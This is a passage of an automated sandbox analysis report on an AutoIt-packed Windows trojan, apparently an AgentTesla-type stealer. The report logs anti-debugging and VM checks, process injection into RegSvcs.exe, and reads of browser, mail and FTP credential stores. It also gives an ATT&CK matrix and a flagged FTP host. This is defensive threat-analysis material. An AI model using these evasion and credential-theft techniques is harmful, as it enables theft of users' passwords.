                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599116Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599016Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598857Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598697Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598016Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597797Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594328Jump to behavior
                    Source: RegSvcs.exe, 00000002.00000002.4592116922.0000000005D75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
                    Source: RegSvcs.exe, 00000002.00000002.4590853406.00000000029A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: RegSvcs.exe, 00000002.00000002.4589295226.0000000000402000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: vmware
                    Source: RegSvcs.exe, 00000002.00000002.4589295226.0000000000402000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: VMwareVBox
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeAPI call chain: ExitProcess graph end nodegraph_0-101628

                    Anti Debugging

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00DF7078 CheckRemoteDebuggerPresent,2_2_00DF7078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003B3F09 BlockInput,0_2_003B3F09
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00343B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00343B3A
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00375A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00375A7C
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00344B37 LoadLibraryA,GetProcAddress,0_2_00344B37
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00C722D8 mov eax, dword ptr fs:[00000030h]0_2_00C722D8
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00C72278 mov eax, dword ptr fs:[00000030h]0_2_00C72278
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00C70C58 mov eax, dword ptr fs:[00000030h]0_2_00C70C58
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003980A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_003980A9
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_0036A124 SetUnhandledExceptionFilter,0_2_0036A124
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_0036A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0036A155
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 927008Jump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003987B1 LogonUserW,0_2_003987B1
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00343B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00343B3A
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003448D7
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003A4C27 mouse_event,0_2_003A4C27
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Q5QrxfKnFA.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00397CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00397CAF
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_0039874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0039874B
                    Source: Q5QrxfKnFA.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: Q5QrxfKnFA.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_0036862B cpuid 0_2_0036862B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00374E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00374E87
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00381E06 GetUserNameW,0_2_00381E06
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00373F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00373F3A
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003449A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.Q5QrxfKnFA.exe.5a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Q5QrxfKnFA.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4590853406.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4590853406.00000000029CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4589295226.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Q5QrxfKnFA.exe PID: 2276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4364, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Q5QrxfKnFA.exeBinary or memory string: WIN_81
                    Source: Q5QrxfKnFA.exeBinary or memory string: WIN_XP
                    Source: Q5QrxfKnFA.exeBinary or memory string: WIN_XPe
                    Source: Q5QrxfKnFA.exeBinary or memory string: WIN_VISTA
                    Source: Q5QrxfKnFA.exeBinary or memory string: WIN_7
                    Source: Q5QrxfKnFA.exeBinary or memory string: WIN_8
                    Source: Q5QrxfKnFA.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 0.2.Q5QrxfKnFA.exe.5a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Q5QrxfKnFA.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4590853406.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4589295226.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Q5QrxfKnFA.exe PID: 2276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4364, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.Q5QrxfKnFA.exe.5a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Q5QrxfKnFA.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4590853406.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4590853406.00000000029CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4589295226.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Q5QrxfKnFA.exe PID: 2276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4364, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003B6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_003B6283
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003B6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_003B6747
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts
                    221
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    1
                    Exfiltration Over Alternative Protocol
                    1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Native API
                    2
                    Valid Accounts
                    1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    21
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    1
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                    Valid Accounts
                    2
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    2
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation
                    1
                    DLL Side-Loading
                    NTDS138
                    System Information Discovery
                    Distributed Component Object Model21
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection
                    2
                    Valid Accounts
                    LSA Secrets651
                    Security Software Discovery
                    SSH3
                    Clipboard Data
                    12
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts231
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials231
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Access Token Manipulation
                    DCSync2
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                    Process Injection
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Q5QrxfKnFA.exe79%ReversingLabsWin32.Trojan.AutoItinject
                    Q5QrxfKnFA.exe57%VirustotalBrowse
                    Q5QrxfKnFA.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://ftp.jeepcommerce.rs100%Avira URL Cloudmalware
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ftp.jeepcommerce.rs
                    195.252.110.253
                    truefalse
                      high
                      ip-api.com
                      208.95.112.1
                      truefalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://ip-api.com/line/?fields=hostingfalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://ftp.jeepcommerce.rsRegSvcs.exe, 00000002.00000002.4590853406.00000000029CE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://ip-api.com/line/?fields=hostingPRegSvcs.exe, 00000002.00000002.4590295730.0000000000EC0000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://account.dyn.com/Q5QrxfKnFA.exe, 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4589295226.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.4590853406.0000000002971000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://ip-api.comRegSvcs.exe, 00000002.00000002.4590853406.0000000002971000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  208.95.112.1
                                  ip-api.comUnited States
                                  53334TUT-ASUSfalse
                                  195.252.110.253
                                  ftp.jeepcommerce.rsSerbia
                                  6700BEOTEL-AShttpwwwbeotelnetRSfalse
                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1588712
                                  Start date and time:2025-01-11 04:30:44 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 8m 30s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:10
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:Q5QrxfKnFA.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:bc3bb7cdc4c87d2888c0c64f15f9953a79da7baa2d31874dd168db28f2b79256.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@3/2@2/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 52
                                  • Number of non-executed functions: 275
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  TimeTypeDescription
                                  22:31:37API Interceptor10763121x Sleep call for process: RegSvcs.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  208.95.112.1RHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  J8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
